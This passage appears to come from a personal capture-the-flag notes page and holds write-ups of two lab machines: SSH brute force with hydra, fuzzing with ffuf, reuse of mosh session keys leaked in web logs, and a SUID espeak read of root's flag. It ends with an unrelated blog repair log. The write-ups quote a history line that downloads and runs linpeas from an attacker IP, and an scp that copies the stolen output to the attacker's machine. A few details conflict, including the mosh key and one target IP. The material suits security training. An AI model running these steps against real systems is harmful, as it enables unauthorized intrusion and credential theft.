  • {20}: a quantifier; the preceding class must occur exactly 20 times in a row.

Copy a.txt to the attacking machine and crack with hydra (run locally):

```bash
scp kotori@192.168.3.192:~/a.txt ./
```
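The raw a.txt is over 54000 lines and, as the hydra log further down shows, the same identifier (klanguageoverridesrc) is tried several times in the first eight attempts: the grep output was never deduplicated or ordered, and the password only came up quickly by luck. As an added example (not from the page), here is the same extraction done with the two missing steps: unique tokens only, ranked so that strings mixing cases and digits, which is what a generated password looks like, come before plain identifiers and words. The sample text is constructed from tokens visible in the page's hydra output; the scoring weights and function names are this example's own.

```python
# Added example, not from the page: the 20-character token hunt with
# deduplication and a password-likeness ordering for the hydra wordlist.
import re
from typing import List

# same expression the grep used: \b[a-zA-Z0-9]{20}\b
TOKEN_RE = re.compile(r"\b[A-Za-z0-9]{20}\b")


def score(token: str) -> int:
    """Higher = more password-like.  Ten points per character class present
    (lower, upper, digit) plus one per change of class along the string, so
    'klanguageoverridesrc' scores 10 and 'sF6Kfzr69w7dyZALAhl6' scores 41."""
    classes = sum((any(c.islower() for c in token),
                   any(c.isupper() for c in token),
                   any(c.isdigit() for c in token)))
    kinds = ["d" if c.isdigit() else ("u" if c.isupper() else "l") for c in token]
    transitions = sum(1 for x, y in zip(kinds, kinds[1:]) if x != y)
    return classes * 10 + transitions


def extract_candidates(text: str) -> List[str]:
    """Unique 20-character [A-Za-z0-9] tokens, most password-like first;
    ties keep first-seen order so the output is deterministic."""
    first_seen = {}
    for m in TOKEN_RE.finditer(text):
        first_seen.setdefault(m.group(0), len(first_seen))
    return sorted(first_seen, key=lambda t: (-score(t), first_seen[t]))


# constructed blob standing in for the concatenated grep input
SAMPLE = """
klanguageoverridesrc=1
[GetServerInformation] klanguageoverridesrc
drmGetMinorNameForFD(int fd)
PubkeyAuthentication yes
password: sF6Kfzr69w7dyZALAhl6
tooShort12345 klanguageoverridesrc
"""

if __name__ == "__main__":
    import sys
    # usage: python3 rank_tokens.py a.txt > ranked.txt   (file name is hypothetical)
    data = open(sys.argv[1], errors="replace").read() if len(sys.argv) > 1 else SAMPLE
    print("\n".join(extract_candidates(data)))
```

Feed the ranked list to the same hydra command; `sort -u a.txt` alone already removes the repeats if ordering is not wanted.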

```text
hydra -t 4 -l root -P a.txt -I -f -vV 192.168.3.192 ssh
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-01-13 22:52:46
[DATA] max 4 tasks per 1 server, overall 4 tasks, 54060 login tries (l:1/p:54060), ~13515 tries per task
[DATA] attacking ssh://192.168.3.192:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://root@192.168.3.192:22
[INFO] Successful, password authentication is supported by ssh://192.168.3.192:22
[ATTEMPT] target 192.168.3.192 - login "root" - pass "klanguageoverridesrc" - 1 of 54060 [child 0] (0/0)
[ATTEMPT] target 192.168.3.192 - login "root" - pass "GetServerInformation" - 2 of 54060 [child 1] (0/0)
[ATTEMPT] target 192.168.3.192 - login "root" - pass "klanguageoverridesrc" - 3 of 54060 [child 2] (0/0)
[ATTEMPT] target 192.168.3.192 - login "root" - pass "klanguageoverridesrc" - 4 of 54060 [child 3] (0/0)
[ATTEMPT] target 192.168.3.192 - login "root" - pass "klanguageoverridesrc" - 5 of 54060 [child 0] (0/0)
[ATTEMPT] target 192.168.3.192 - login "root" - pass "drmGetMinorNameForFD" - 6 of 54060 [child 1] (0/0)
[ATTEMPT] target 192.168.3.192 - login "root" - pass "sF6Kfzr69w7dyZALAhl6" - 7 of 54060 [child 3] (0/0)
[ATTEMPT] target 192.168.3.192 - login "root" - pass "PubkeyAuthentication" - 8 of 54060 [child 2] (0/0)
[22][ssh] host: 192.168.3.192 login: root password: sF6Kfzr69w7dyZALAhl6
[STATUS] attack finished for 192.168.3.192 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-01-13 22:52:50
```

Result:
user: root
pass: sF6Kfzr69w7dyZALAhl6

[!NOTE] Options

  • -I: ignore an existing hydra.restore file and start from the beginning. Hydra writes that file when a run is interrupted so it can resume later; -I skips it (and the 10-second wait) and re-reads the wordlist from the top.

  • -f: stop as soon as one valid login/password pair is found instead of working through the rest of the wordlist; the right choice when a single credential is all that is needed.

  • -vV: -v is verbose, -V additionally prints every login/password attempt; together they show each attempt, the connection state, progress and the final result, which helps when debugging a run.

  • -t 4: four parallel connections. More is faster, but sshd's connection limits and any rate limiting make 4-10 the practical range. Note also that the 54060-line wordlist contains many repeats (klanguageoverridesrc is tried four times in the first five attempts); `sort -u a.txt` beforehand would have shortened the run.

  • -l root: a single fixed username, root (lower-case l). For a list of usernames use upper-case -L with a file (for example -L user.txt).

  • -P a.txt: the password list (upper-case P), one password per line, read in order. Lower-case -p instead gives a single fixed password (for example -p 123456).

Become root

```text
kotori@Moodle:~$ su
Password:
root@Moodle:/home/kotori# ls
a.txt linpeas.sh user.txt
root@Moodle:/home/kotori# id
uid=0(root) gid=0(root) groups=0(root)
root@Moodle:/home/kotori# cat user.txt
flag{user-de7202216bc84a6aa04762061c9e9ad2}
root@Moodle:/home/kotori# cd /root
root@Moodle:~# ls
rootpass.txt root.txt
root@Moodle:~# cat root.txt
flag{root-ea6233d6aa262b93419775a51a8cc1df}
```

Option 2

```text
kotori@Moodle:~$ cat .bash_history
last
exit
ls al
ls- al
wget 192.168.3.94/linpeas.sh
bash linpeas.sh
exit
```

`last` prints an abbreviated login history by default; -F gives full timestamps, -i shows addresses numerically and -w shows full user names:

```text
kotori@Moodle:~$ last -F -i -w
kotori pts/1 192.168.3.48 Tue Jan 13 09:45:18 2026 still logged in
reboot system boot 0.0.0.0 Tue Jan 13 08:45:58 2026 still running
root pts/0 192.168.3.94 Fri Dec 26 23:13:35 2025 - crash (17+09:32)
reboot system boot 0.0.0.0 Fri Dec 26 23:13:00 2025 still running
sF6Kfzr69w7dyZALAhl6 pts/1 192.168.3.94
·······
```

This gives the same password, sF6Kfzr69w7dyZALAhl6: someone typed it at the login prompt in place of a username, so it was recorded as a user name in /var/log/wtmp, which is world-readable by default. That is the "hidden in plain sight" of the hint.

1. Information gathering

```text
☁  ~  nmap -sVC -p- 192.168.3.52
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-25 19:40 CST
Nmap scan report for 192.168.3.52
Host is up (0.0013s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 10.0 (protocol 2.0)
80/tcp open http nginx
|_http-title: 403 Forbidden
| http-robots.txt: 3 disallowed entries
|_/admin/ /backup/ /*-logs/
MAC Address: 08:00:27:54:7B:37 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
```

```text
☁  ~  feroxbuster -u http://192.168.3.52
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.13.1
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.3.52/
🚩 In-Scope Url │ 192.168.3.52
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.13.1
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 7l 11w 146c http://192.168.3.52/backup
404 GET 7l 11w 146c http://192.168.3.52/admin
404 GET 7l 11w 146c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 7l 9w 146c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
[####################] - 12s 30002/30002 0s found:2 errors:0
[####################] - 12s 30000/30000 2549/s http://192.168.3.52/
```

Visit http://192.168.3.52/robots.txt:

```text
User-agent: *
Disallow: /admin/
Disallow: /backup/
Disallow: /*-logs/
```

2. Vulnerability discovery and exploitation

https://www.doubao.com/thread/w3448713da0d0653c introduces ffuf (Fuzz Faster U Fool)

Sensitive file discovery

Following the /*-logs/ hint, fuzz the prefix with ffuf:

```text
☁  ~  ffuf -u http://192.168.3.52/FUZZ-logs -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -fc 404


/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : http://192.168.3.52/FUZZ-logs
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response status: 404
________________________________________________

mosh [Status: 301, Size: 162, Words: 5, Lines: 8, Duration: 4ms]
:: Progress: [56162/56162] :: Job [1/1] :: 3278 req/sec :: Duration: [0:00:22] :: Errors: 0 ::
```

==Result: the directory /mosh-logs/ exists.==

[!NOTE] Options
-fc 404 : --filter-code
Filter out responses with the given HTTP status code. Hiding the 404s leaves 200 (found), 301/302 (redirect), 403 (forbidden) and the other meaningful codes, so the output stays readable.

Still nothing to see there, so keep going with ffuf, this time for files inside the directory:

☁  ~  ffuf -u http://192.168.3.52/mosh-logs/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -e .txt,.php,.log -fc 404

/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : http://192.168.3.52/mosh-logs/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt
:: Extensions : .txt .php .log
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response status: 404
________________________________________________

reminder [Status: 200, Size: 37, Words: 2, Lines: 2, Duration: 14ms]
:: Progress: [224648/224648] :: Job [1/1] :: 2816 req/sec :: Duration: [0:01:36] :: Errors: 0 ::

Read the contents of reminder:

$(date +\%Y-\%m-\%d_\%H-\%M-\%S).log

How it works: this is a hint that the directory contains log files named by timestamp, in the format YYYY-MM-DD_HH-MM-SS.log.

Brute-forcing the log file names

Since the directory cannot be listed directly (403), the file names have to be guessed from the server's current time. The HTTP Date header gives the server time in GMT, but Nmap suggests the system time zone is probably CST (GMT+8).

(CST here is China Standard Time.)

curl -I http://192.168.3.52/mosh-logs/
HTTP/1.1 403 Forbidden
Server: nginx
Date: Tue, 27 Jan 2026 13:14:59 GMT
Content-Type: text/html
Content-Length: 146
Connection: keep-alive

Write a Python script to generate a timestamp wordlist, then brute-force with it:

# gen_wordlist.py
import datetime

start = datetime.datetime(2026, 1, 27, 21, 0, 0)  # server time expressed in CST
end = datetime.datetime(2026, 1, 27, 22, 0, 0)
step = datetime.timedelta(seconds=1)
current = start
while current <= end:
    print(current.strftime('%Y-%m-%d_%H-%M-%S.log'))
    current += step

Run the brute force:

python3 gen_wordlist.py > time_wordlist.txt
ffuf -u http://192.168.43.224/mosh-logs/FUZZ -w time_wordlist.txt -fc 404
☁  mosh  ffuf -u http://192.168.3.52/mosh-logs/FUZZ -w word_list.txt -fc 404

/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : http://192.168.3.52/mosh-logs/FUZZ
:: Wordlist : FUZZ: /root/localkali/mytarget/mosh/word_list.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response status: 404
________________________________________________

2026-01-27_21-00-00.log [Status: 200, Size: 374, Words: 45, Lines: 10, Duration: 25ms]
2026-01-27_21-01-00.log [Status: 200, Size: 125, Words: 17, Lines: 4, Duration: 8ms]
2026-01-27_21-02-00.log [Status: 200, Size: 374, Words: 45, Lines: 10, Duration: 50ms]
2026-01-27_21-03-00.log [Status: 200, Size: 125, Words: 17, Lines: 4, Duration: 29ms]
2026-01-27_21-04-00.log [Status: 200, Size: 374, Words: 45, Lines: 10, Duration: 13ms]
2026-01-27_21-06-00.log [Status: 200, Size: 374, Words: 45, Lines: 10, Duration: 7ms]
2026-01-27_21-07-00.log [Status: 200, Size: 125, Words: 17, Lines: 4, Duration: 15ms]
2026-01-27_21-05-00.log [Status: 200, Size: 125, Words: 17, Lines: 4, Duration: 162ms]
2026-01-27_21-08-00.log [Status: 200, Size: 374, Words: 45, Lines: 10, Duration: 36ms]
2026-01-27_21-09-00.log [Status: 200, Size: 125, Words: 17, Lines: 4, Duration: 2ms]
2026-01-27_21-10-00.log [Status: 200, Size: 374, Words: 45, Lines: 10, Duration: 5ms]
2026-01-27_21-11-00.log [Status: 200, Size: 125, Words: 17, Lines: 4, Duration: 1ms]
2026-01-27_21-12-00.log [Status: 200, Size: 374, Words: 45, Lines: 10, Duration: 2ms]
2026-01-27_21-13-00.log [Status: 200, Size: 125, Words: 17, Lines: 4, Duration: 4ms]
2026-01-27_21-14-00.log [Status: 200, Size: 374, Words: 45, Lines: 10, Duration: 13ms]
2026-01-27_21-16-00.log [Status: 200, Size: 374, Words: 45, Lines: 10, Duration: 26ms]
2026-01-27_21-15-00.log [Status: 200, Size: 125, Words: 17, Lines: 4, Duration: 57ms]
2026-01-27_21-17-00.log [Status: 200, Size: 125, Words: 17, Lines: 4, Duration: 33ms]
2026-01-27_21-18-00.log [Status: 200, Size: 374, Words: 45, Lines: 10, Duration: 18ms]
2026-01-27_21-19-00.log [Status: 200, Size: 125, Words: 17, Lines: 4, Duration: 16ms]
2026-01-27_21-20-00.log [Status: 200, Size: 374, Words: 45, Lines: 10, Duration: 7ms]
2026-01-27_21-21-00.log [Status: 200, Size: 125, Words: 17, Lines: 4, Duration: 6ms]
2026-01-27_21-22-00.log [Status: 200, Size: 374, Words: 45, Lines: 10, Duration: 14ms]
:: Progress: [3601/3601] :: Job [1/1] :: 3174 req/sec :: Duration: [0:00:02] :: Errors: 0 ::

Log files found, e.g. 2026-01-27_21-00-00.log. Note that every file name ends on a whole minute (the seconds field is always 00).
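As an added example (not part of the original writeup), here is the wordlist generation above redone with the time-zone step made explicit: the Date header from the 403 response is parsed as GMT, shifted to CST (UTC+8, as the text assumes), and, because every file name observed ends on a whole minute, candidates are generated at one-minute steps around the server time rather than one per second. The header value is the one shown above; the size of the window is an assumption.

```python
from datetime import datetime, timedelta, timezone
from email.utils import parsedate_to_datetime

# Assumption from the writeup: the Date header is GMT, the file names follow
# the system clock in China Standard Time (UTC+8). A fixed offset is used so
# the script does not depend on tzdata.
CST = timezone(timedelta(hours=8))

# Constructed input: the Date header returned by the 403 response above.
DATE_HEADER = "Tue, 27 Jan 2026 13:14:59 GMT"


def server_time_in_cst(date_header):
    """Parse an HTTP Date header (IMF-fixdate) and shift it to CST."""
    return parsedate_to_datetime(date_header).astimezone(CST)


def log_name_candidates(now_cst, minutes_back=30, minutes_forward=0,
                        step=timedelta(minutes=1)):
    """Generate YYYY-MM-DD_HH-MM-SS.log names around now_cst.

    The files on this box are written on whole minutes, so seconds are
    truncated and the step defaults to one minute: 31 names for a 30-minute
    window instead of the 3,601 per-second names of the original script.
    """
    base = now_cst.replace(second=0, microsecond=0)
    start = base - timedelta(minutes=minutes_back)
    end = base + timedelta(minutes=minutes_forward)
    names = []
    t = start
    while t <= end:
        names.append(t.strftime('%Y-%m-%d_%H-%M-%S.log'))
        t += step
    return names


if __name__ == "__main__":
    now = server_time_in_cst(DATE_HEADER)
    for name in log_name_candidates(now):
        print(name)
```

Redirect the output to a file and pass it to ffuf with -w exactly as in the writeup; the one-minute granularity is what makes the list small enough to try in a couple of seconds.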

3. Obtaining the Mosh key

Read one of the discovered log files:

curl http://192.168.3.52/mosh-logs/2026-01-27_21-00-00.log

Log content:

MOSH CONNECT 60001 3AIPfX2xyFgIjkby89Dusw

mosh-server (mosh 1.4.0) [build mosh 1.4.0]
Copyright 2012 Keith Winstein <mosh-devel@mit.edu>
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

[mosh-server detached, pid = 2981]

Key information:

  • Mosh port: 60001 (UDP)
  • Mosh key: NU7fS6rZ653j7Zo2iRDbPA

Fetching the Mosh key dynamically

The Mosh key sits in plain text in the HTTP-exposed logs, but it is only valid for a very short time (about 1 minute). If the connection fails, scan the newest log files to pick up a fresh key.

Command to scan the most recent logs (example):

# Scan the logs from 21:20 to 21:30 for MOSH CONNECT lines
for m in $(seq -w 20 30); do
    curl -s --raw http://192.168.3.52/mosh-logs/2026-01-27_21-$m-00.log | grep 'MOSH CONNECT'
done

Note:

  • seq -w 20 30: prints the consecutive numbers 20 to 30, zero-padded to equal width (-w = equal width), i.e. 20 21 22 23 24 25 26 27 28 29 30
  • --raw: tells curl to disable its internal decoding of HTTP content and transfer encodings and pass the body through unchanged, so the log text arrives exactly as the server sent it

Result:

MOSH CONNECT 60001 8juuu73hgZWVqGYkKGY6pg
MOSH CONNECT 60001 HA8P0M4IVRF5mwN0MgalRg
MOSH CONNECT 60001 kcxCHRz1hAwKKr3XAEtyDA
MOSH CONNECT 60001 6IxWNy6/RJHOLPmvBCuf3w
MOSH CONNECT 60001 Gxl5qB/sXV9x5+M9eMJ4PQ

Pick the last one, which is the most recent.
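The loop above does the search by hand; the following added example (not from the writeup) parses a set of log files for the MOSH CONNECT line and reports the most recent one. The sample contents are constructed in the style of the log shown above. From the defender's side this is the check worth running over any log tree a web server can read: mosh-server prints its session key on stdout, so redirecting that output into a web-served directory is a credential leak, and a scanner like this finds every key that has ever been written there.

```python
import re
from datetime import datetime

# File names in mosh-logs/ are timestamps: YYYY-MM-DD_HH-MM-SS.log
LOG_NAME_RE = re.compile(r"^(\d{4}-\d{2}-\d{2}_\d{2}-\d{2}-\d{2})\.log$")
# mosh-server prints this line for the client; the key is 22 base64 characters.
MOSH_CONNECT_RE = re.compile(r"^MOSH CONNECT (\d+) ([A-Za-z0-9+/]{22})$", re.M)

# Constructed sample in the style of the files found above (the keys are the
# ones quoted in the writeup; the middle file stands for the short 125-byte
# files that contain no key).
SAMPLE_LOGS = {
    "2026-01-27_21-00-00.log": (
        "MOSH CONNECT 60001 3AIPfX2xyFgIjkby89Dusw\n\n"
        "mosh-server (mosh 1.4.0) [build mosh 1.4.0]\n"
        "[mosh-server detached, pid = 2981]\n"
    ),
    "2026-01-27_21-01-00.log": "mosh-server (mosh 1.4.0) [build mosh 1.4.0]\n",
    "2026-01-27_21-02-00.log": "MOSH CONNECT 60001 Gxl5qB/sXV9x5+M9eMJ4PQ\n",
}


def find_leaked_keys(logs):
    """Return [(timestamp, filename, port, key)] for every MOSH CONNECT line,
    oldest first. `logs` maps file name -> file content."""
    found = []
    for name, content in logs.items():
        m = LOG_NAME_RE.match(name)
        if not m:
            continue  # not a timestamped log, skip it
        ts = datetime.strptime(m.group(1), "%Y-%m-%d_%H-%M-%S")
        for port, key in MOSH_CONNECT_RE.findall(content):
            found.append((ts, name, int(port), key))
    return sorted(found)


def latest_key(logs):
    """(filename, port, key) of the newest leaked key, or None if none."""
    found = find_leaked_keys(logs)
    if not found:
        return None
    _, name, port, key = found[-1]
    return name, port, key


if __name__ == "__main__":
    for ts, name, port, key in find_leaked_keys(SAMPLE_LOGS):
        print(f"{name}: port {port} key {key}")
    print("newest:", latest_key(SAMPLE_LOGS))
```

To run it against a real directory, build the dict from the files on disk (or from the curl output of the loop above) and pass it to find_leaked_keys; the timestamp in the file name, not the file's mtime, decides which key is newest.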

Logging in with mosh

With the key in hand, mosh-client can connect to the target directly. Command format:

MOSH_KEY=NU7fS6rZ653j7Zo2iRDbPA mosh-client 192.168.3.52 60001

The SSH trap and how to get around it

Connecting directly over SSH as mosh@192.168.3.52 lands you in a garbled, flickering ncurses screen. This is actually a restricted TUI program (a trap) from which no interactive shell can be obtained. Mosh (Mobile Shell) runs over UDP and talks straight to the mosh-server process on the box, bypassing the restricted SSH pseudo-terminal and giving a normal shell.

4. Login and privilege escalation

Mosh:~$ cat user.txt 
flag{user-3862995f666ac41681befb81b89a0103}

Privilege escalation

Mosh:~$ find / -perm -u=s 2>/dev/null
/bin/bbsuid
/usr/bin/espeak

https://gtfobins.org/gtfobins/espeak/

Mosh:~$ /usr/bin/espeak -qXf /root/root.txt > res.txt
# copy res.txt back to the Kali box
Mosh:~$ scp res.txt root@192.168.3.53:/root/localkali/mytarget/mosh/.

Viewing the result

☁  mosh  cat res.txt               
Unpronouncable? 'flag'
39 _) f (L01Y [f]

Translate 'flag'
1 f [f]
39 _) f (L01Y [f]

1 l [l]

1 a [a]

1 g [g]

Translate '{'

Found: '_{' [lEftbreIs]
Translate 'root'
1 r [r]

36 oo [u:]
1 o [0]
4 X) o [0#]

1 t [t]

Flags: a $nounf
Translate 'a'
40 _) a (_D [,eI]
1 a [a]
26 _) a (_ [a#]

Found: '_9' [n'aIn]
Found: 'e' [i:]
Found: '_2X' [tw'Ent2i]
Found: '_6' [s'Iks]
Found: 'f' [Ef]
Found: '_8X' ['eIti]
Found: '_8' ['eIt]
Flags: a $nounf
Translate 'a'
40 _) a (_D [,eI]
1 a [a]
26 _) a (_ [a#]
45 D_) a (_ [eI]

Found: '_4X' [f'o@ti]
Found: '_9' [n'aIn]
Found: 'f' [Ef]
Found: '_5X' [f'Ifti]
Found: '_4' [f'o@]
Translate 'ce'
1 c [k]
22 c (e [s]

1 e [E]
45 XC) e (_N [i:]

Found: '_3' [Tr'i:]
Translate 'fe'
1 f [f]

1 e [E]
45 XC) e (_N [i:]

Found: '_2X' [tw'Ent2i]
Found: '_9' [n'aIn]
Flags: a $nounf
Translate 'a'
40 _) a (_D [,eI]
1 a [a]
26 _) a (_ [a#]
45 D_) a (_ [eI]

Found: '_8' ['eIt]
Found: 'b' [bi:]
Found: '_9' [n'aIn]
Found: 'f' [Ef]
Found: '_8' ['eIt]
Found: 'f' [Ef]
Found: '_0C' [h'Vndr@d]
Found: '_0M1' [T'aUz@nd]
Found: '_3' [Tr'i:]
Found: '_1' [w'02n]
Found: '_0and' [@n]
Found: '_3X' [T'3:ti]
Found: '_3' [Tr'i:]
Translate '}'

Found: '_}' [raItbreIs]
fl'ag_:_: r'u:t,eI n'aIn 'i: tw'Entis'Iks 'Ef 'eIti;'eIt 'eI f'o@tin'aIn 'Ef f'Iftif'o@ s'i: Tr'i: f'i: tw'Entin'aIn 'eI 'eIt b'i: n'aIn 'Ef 'eIt 'Ef Tr'i: T'aUz@nd w'0nh'Vndr@d@n T'3:tiTr'i:

Feed this output to an AI and have it decode the text.

flag{root-a9e26f88a49f54ce3fe29a8b9f8f3133}
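Instead of handing the trace to an AI, the espeak -X output can be decoded mechanically. The following added example (not from the writeup) parses the trace: Translate lines give words, Found lines give spelled-out letters, the braces and the number-word lookups, and a run of number tokens is rebuilt from the magnitude words (_0M1 thousand, _0C hundred, _NX tens, _N units) in the order espeak emits them in the trace above. Punctuation that espeak does not voice, such as the hyphen after root, leaves no trace at all and has to be restored by hand. The sample is the trace above with most of the rule lines trimmed.

```python
import re

# Constructed sample: the Translate/Found lines of the espeak -qX trace above,
# with a few rule lines kept to show that they are ignored.
SAMPLE_TRACE = """\
Unpronouncable? 'flag'
39 _) f (L01Y [f]

Translate 'flag'
1 f [f]
Translate '{'

Found: '_{' [lEftbreIs]
Translate 'root'
36 oo [u:]
Flags: a $nounf
Translate 'a'
Found: '_9' [n'aIn]
Found: 'e' [i:]
Found: '_2X' [tw'Ent2i]
Found: '_6' [s'Iks]
Found: 'f' [Ef]
Found: '_8X' ['eIti]
Found: '_8' ['eIt]
Translate 'a'
Found: '_4X' [f'o@ti]
Found: '_9' [n'aIn]
Found: 'f' [Ef]
Found: '_5X' [f'Ifti]
Found: '_4' [f'o@]
Translate 'ce'
Found: '_3' [Tr'i:]
Translate 'fe'
Found: '_2X' [tw'Ent2i]
Found: '_9' [n'aIn]
Translate 'a'
Found: '_8' ['eIt]
Found: 'b' [bi:]
Found: '_9' [n'aIn]
Found: 'f' [Ef]
Found: '_8' ['eIt]
Found: 'f' [Ef]
Found: '_0C' [h'Vndr@d]
Found: '_0M1' [T'aUz@nd]
Found: '_3' [Tr'i:]
Found: '_1' [w'02n]
Found: '_0and' [@n]
Found: '_3X' [T'3:ti]
Found: '_3' [Tr'i:]
Translate '}'
Found: '_}' [raItbreIs]
"""

TRANSLATE_RE = re.compile(r"^Translate '([^']*)'")
FOUND_RE = re.compile(r"^Found: '([^']*)'")
DIGIT_RE = re.compile(r"^_(\d)(X?)$")  # _9 = nine, _2X = twenty
FILLER = ("_0C", "_0M1", "_0and")      # hundred, thousand, "and"


def number_from_tokens(tokens):
    """Rebuild the decimal digits of one spoken number from its lookup tokens.

    Assumption (matches the trace on this page): espeak looks up the magnitude
    words _0M1 (thousand) and _0C (hundred) before the digits of that number,
    and the digits then follow in place-value order. _0and is filler.
    """
    digits = [m for m in (DIGIT_RE.match(t) for t in tokens) if m]
    value = 0
    if "_0M1" in tokens and digits:
        value += int(digits.pop(0).group(1)) * 1000
    if "_0C" in tokens and digits:
        value += int(digits.pop(0).group(1)) * 100
    for m in digits:
        n = int(m.group(1))
        value += n * 10 if m.group(2) else n   # 'X' suffix marks a tens word
    return str(value)


def decode_espeak_trace(trace):
    """Reassemble the text espeak was asked to read from its -X trace."""
    text = []
    run = []  # number tokens of the number currently being read

    def flush():
        if run:
            text.append(number_from_tokens(run))
            run.clear()

    for line in trace.splitlines():
        m = TRANSLATE_RE.match(line)
        if m:
            flush()
            word = m.group(1)
            if word.isalpha():     # punctuation is reported again via Found: '_{'
                text.append(word)
            continue
        m = FOUND_RE.match(line)
        if not m:
            continue               # rule traces, Flags: lines, the phoneme line
        tok = m.group(1)
        if DIGIT_RE.match(tok) or tok in FILLER:
            run.append(tok)
        else:
            flush()
            if tok == "_{":
                text.append("{")
            elif tok == "_}":
                text.append("}")
            elif len(tok) == 1:    # a letter read out by name ("e", "f", "b")
                text.append(tok)
    flush()
    return "".join(text)


if __name__ == "__main__":
    print(decode_espeak_trace(SAMPLE_TRACE))
```

The decoder is only as general as the token forms seen in this trace: a digit run with an interior or leading zero would be voiced differently by espeak and is not covered here, so compare the result against the phoneme line at the end of the trace before trusting it.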

Obsidian + Hexo repair log, 2026-05-03

Problem

Every post title on the Hexo blog index showed as Untitled, and images did not display.

Cause

  1. Missing titles: the Obsidian vault is used as the Hexo post source through the symlink source/_posts → obsidian/, but the markdown files lacked the YAML frontmatter Hexo requires (title, date, categories).
  2. Image 404s: images were scattered across per-directory images/ and assets/ folders; prependRoot: true rewrote the paths to /assets/xxx.png, but there was no assets/ directory under source/, so the images were never copied to public/.

Fixes

1. Batch-add frontmatter (32 .md files)

---
title: "extracted from the # heading"
date: 2026-05-0X
categories:
  - parent directory
  - subdirectory
---
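An added example (not part of the repair log) of how step 1 can be scripted: the frontmatter is built from the first "# " heading, the parent directories become the categories, and a file that already has frontmatter is left alone. The path and date are passed in by the caller; the sample markdown is constructed.

```python
import json
import re
from pathlib import PurePosixPath

HEADING_RE = re.compile(r"^#\s+(.+?)\s*$", re.M)


def add_frontmatter(md_text, rel_path, date):
    """Prepend Hexo frontmatter built from the first '# ' heading and the
    file's parent directories (used as categories, outermost first).

    Idempotent: text that already starts with '---' is returned unchanged.
    rel_path is the path relative to the vault root, e.g. "靶机/QQGroup/Mosh.md".
    """
    if md_text.lstrip().startswith("---"):
        return md_text
    path = PurePosixPath(rel_path)
    m = HEADING_RE.search(md_text)
    title = m.group(1) if m else path.stem      # fall back to the file name
    lines = [
        "---",
        # JSON quoting is valid YAML double-quoting, so quotes in titles are safe
        f"title: {json.dumps(title, ensure_ascii=False)}",
        f"date: {date}",
        "categories:",
    ]
    lines += [f"  - {part}" for part in path.parent.parts]
    lines.append("---")
    return "\n".join(lines) + "\n\n" + md_text


# Constructed sample post.
SAMPLE_MD = "# Mosh\n\nSome text.\n"

if __name__ == "__main__":
    print(add_frontmatter(SAMPLE_MD, "靶机/QQGroup/Mosh.md", "2026-05-03"))
```

Applied over the vault with os.walk and the file's relative path, this produces the same frontmatter shape as the template above; the date still has to come from the caller, since the heading carries none.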

2. Unified image management

  • 126 images moved to obsidian/assets/ (the vault root)
  • All markdown references changed from images/xxx.png to assets/xxx.png
  • Symlink source/assets → obsidian/assets created, so Hexo copies the images to public/assets/ automatically

3. Obsidian configuration updates

File and change:

  • .obsidian/app.json: attachmentFolderPath → assets
  • .obsidian/plugins/obsidian-custom-attachment-location/data.json: attachmentFolderPath → assets

4. Directory restructuring

